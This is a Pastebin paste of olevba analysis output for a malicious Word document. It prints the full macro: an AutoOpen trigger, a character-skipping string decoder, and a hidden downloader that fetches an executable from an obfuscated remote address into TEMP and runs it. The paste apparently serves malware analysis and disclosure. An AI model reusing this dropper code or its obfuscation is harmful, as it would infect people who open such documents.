dynamoo

Malicious Word macro

Mar 13th, 2015
394
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. XML:MAS---- 2773kxh.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 2773kxh.doc
  10. Type: Word2003_XML
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: editdata.mso - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
  16. z4vF73d
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO ÀâïàâÀ.bas
  27. in file: editdata.mso - OLE stream: u'VBA/\u0410\u0432\u043f\u0430\u0432\u0410'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29.  
  30. Public Function IOVANMdhjbAO(ySIzNYGGtuUeqS As String) As String
  31. For QpHTHEyQNlU = 1 To Len(ySIzNYGGtuUeqS) Step 2
  32. IOVANMdhjbAO = IOVANMdhjbAO & Mid(ySIzNYGGtuUeqS, QpHTHEyQNlU, 1)
  33. Next
  34. End Function
  35. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  36. ANALYSIS:
  37. No suspicious keyword or IOC found.
  38. -------------------------------------------------------------------------------
  39. VBA MACRO ÀÏÀÂÏàâïâ.bas
  40. in file: editdata.mso - OLE stream: u'VBA/\u0410\u041f\u0410\u0412\u041f\u0430\u0432\u043f\u0432'
  41. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  42. #If VBA7 Then
  43.     Private Declare PtrSafe Function ÌÐÎìîðÌÐÎàâï Lib "urlmon" Alias _
  44.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
  45.     ByVal ÏÀÌÎÐâûà As String, _
  46.     ByVal ÏÀÌÎÐâûàf As String, _
  47.     ByVal ÏÀÌÎÐâûàfd As Long, _
  48.     ByVal ÏÀÌÎÐâûàfds As LongPtr) As LongPtr
  49. #Else
  50.     Private Declare Function ÌÐÎìîðÌÐÎàâï Lib "urlmon" Alias _
  51.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
  52.     ByVal ÏÀÌÎÐâûà As String, _
  53.     ByVal ÏÀÌÎÐâûàf As String, _
  54.     ByVal ÏÀÌÎÐâûàfd As Long, _
  55.     ByVal ÏÀÌÎÐâûàfds As Long) As Long
  56. #End If
  57. Sub z4vF73d()
  58. ïðïàðûâà IOVANMdhjbAO(Chr$(104) & Chr$(56) & Chr$(116) & Chr$(65) & Chr$(116) & Chr$(92) & Chr$(112) & Chr$(85) & Chr$(58) & Chr$(52) & Chr$(47) & Chr$(78) & Chr$(47) & Chr$(127) & Chr$(57) & Chr$(127) & Chr$(53) & Chr$(79) & Chr$(46) & Chr$(96) & Chr$(49) & Chr$(120) & Chr$(54) & Chr$(74) & Chr$(51) & Chr$(112) & Chr$(46) & Chr$(72) & Chr$(49) & Chr$(118) & Chr$(50) & Chr$(53) & Chr$(49) & Chr$(102) & Chr$(46) & Chr$(53) & Chr$(49) & Chr$(75) & Chr$(56) & Chr$(63) & Chr$(54) & Chr$(98) & Chr$(47) & Chr$(66) & Chr$(97) & Chr$(110) & Chr$(112) & Chr$(78) & Chr$(105) & Chr$(99) & Chr$(47) & Chr$(110) & Chr$(103) & Chr$(103) & Chr$(98) & Chr$(125) & Chr$(98) & Chr$(58) & Chr$(49) & Chr$(86) & Chr$(46) & Chr$(101) & Chr$(101) & Chr$(104) & Chr$(120) & Chr$(122) & Chr$(101) & Chr$(68)) _
  59. , Environ(IOVANMdhjbAO(Chr$(84) & Chr$(99) & Chr$(77) & Chr$(70) & Chr$(80) & Chr$(83))) & IOVANMdhjbAO(Chr$(92) & Chr$(97) & Chr$(71) & Chr$(129) & Chr$(72) & Chr$(81) & Chr$(106) & Chr$(79) & Chr$(107) & Chr$(110) & Chr$(100) & Chr$(91) & Chr$(102) & Chr$(96) & Chr$(103) & Chr$(80) & Chr$(46) & Chr$(128) & Chr$(101) & Chr$(84) & Chr$(120) & Chr$(43) & Chr$(101) & Chr$(39))
  60. End Sub
  61. Function ïðïàðûâà(zOF3 As String, Dm4y As String) As Boolean
  62. âûàûâÀÀâûà = ÌÐÎìîðÌÐÎàâï(0&, zOF3, Dm4y, 0&, 0&)
  63. ïðïàÀàï = Shell(Dm4y, 0)
  64. End Function
  65.  
  66.  
  67.  
  68.  
  69. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  70. ANALYSIS:
  71. +------------+--------------------+-----------------------------------------+
  72. | Type       | Keyword            | Description                             |
  73. +------------+--------------------+-----------------------------------------+
  74. | Suspicious | Lib                | May run code from a DLL                 |
  75. | Suspicious | Shell              | May run an executable file or a system  |
  76. |            |                    | command                                 |
  77. | Suspicious | Environ            | May read system environment variables   |
  78. | Suspicious | Chr                | May attempt to obfuscate specific       |
  79. |            |                    | strings                                 |
  80. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
  81. +------------+--------------------+-----------------------------------------+
  82. -------------------------------------------------------------------------------
  83. VBA MACRO Class1.cls
  84. in file: editdata.mso - OLE stream: u'VBA/Class1'
  85. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  86. Public Sub VJfmjcZhYHWzt89()
  87. Dim caEhbvHeVNIEE28 As Integer
  88. For caEhbvHeVNIEE28 = 8 To wn
  89. DoEvents
  90. Next caEhbvHeVNIEE28
  91. Dim DcsgpIlJKVLll87 As String
  92. DcsgpIlJKVLll87 = "UDMGtgGDgYjFI65"
  93. End Sub
  94.  
  95. Public Sub rEFykkBadCmlT28()
  96. Dim PxdhIsVstODSN96 As Integer
  97. For PxdhIsVstODSN96 = 6 To zo
  98. DoEvents
  99. Next PxdhIsVstODSN96
  100. Dim lyRYKztwOtcCv68 As String
  101. lyRYKztwOtcCv68 = "QpVdrqKVaheqW83"
  102. End Sub
  103.  
  104. Public Sub xHCiwNdMbiMXH41()
  105. Dim DMjDUoNwJkvod99 As Integer
  106. For DMjDUoNwJkvod99 = 6 To AZ
  107. DoEvents
  108. Next DMjDUoNwJkvod99
  109. Dim MbOCKZMnWgyDP71 As String
  110. MbOCKZMnWgyDP71 = "dLnHyOaEiCcXm17"
  111. End Sub
  112.  
  113. Public Sub pRsFNsbPhfYFW88()
  114. Dim hZLjOUpaCBMMS47 As Integer
  115. For hZLjOUpaCBMMS47 = 7 To Hd
  116. DoEvents
  117. Next hZLjOUpaCBMMS47
  118. Dim iqHqrfwpCwVKm36 As String
  119. iqHqrfwpCwVKm36 = "TZxKCjtsLEbMO94"
  120. End Sub
  121.  
  122. Public Sub qWpQUsRUDvlHS43()
  123. Dim IdGlnffOOYXKa12 As Integer
  124. For IdGlnffOOYXKa12 = 4 To BO
  125. DoEvents
  126. Next IdGlnffOOYXKa12
  127. Dim jYPxUyallTLis72 As String
  128. jYPxUyallTLis72 = "WIblPzwJHhazc55"
  129. End Sub
  130.  
  131. Public Sub ljeCsroJoUhyE78()
  132. Dim VlLLfBEgYlxNH62 As Integer
  133. For VlLLfBEgYlxNH62 = 3 To Uz
  134. DoEvents
  135. Next VlLLfBEgYlxNH62
  136. Dim BBwgLcWwNGMPI35 As String
  137. BBwgLcWwNGMPI35 = "gqyUHUrqCVfvX89"
  138. End Sub
  139.  
  140. Public Sub htVyaunRmFwQL32()
  141. Dim TjUvVjOmkCGbi21 As Integer
  142. For TjUvVjOmkCGbi21 = 8 To QX
  143. DoEvents
  144. Next TjUvVjOmkCGbi21
  145. Dim rLdSRlDmsMiEB93 As String
  146. rLdSRlDmsMiEB93 = "uBpzNGLNvRppY68"
  147. End Sub
  148.  
  149. Public Sub yETfojXKzCRAj76()
  150. Dim pOEEEDavfUYoV65 As Integer
  151. For pOEEEDavfUYoV65 = 1 To ej
  152. DoEvents
  153. Next pOEEEDavfUYoV65
  154. Dim mgSnlzcAerxTa65 As String
  155. mgSnlzcAerxTa65 = "ZlbRmltyNfIuf63"
  156. End Sub
  157.  
  158. Public Sub pEXQlfifgpFAb63()
  159. Dim kIPGmTHKqlBzS46 As Integer
  160. For kIPGmTHKqlBzS46 = 1 To fc
  161. DoEvents
  162. Next kIPGmTHKqlBzS46
  163. Dim TmBfAKqohhFMq17 As String
  164. TmBfAKqohhFMq17 = "oRtXhFaWkBPgf45"
  165. End Sub
  166.  
  167.  
  168. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  169. ANALYSIS:
  170. No suspicious keyword or IOC found.
RAW Paste Data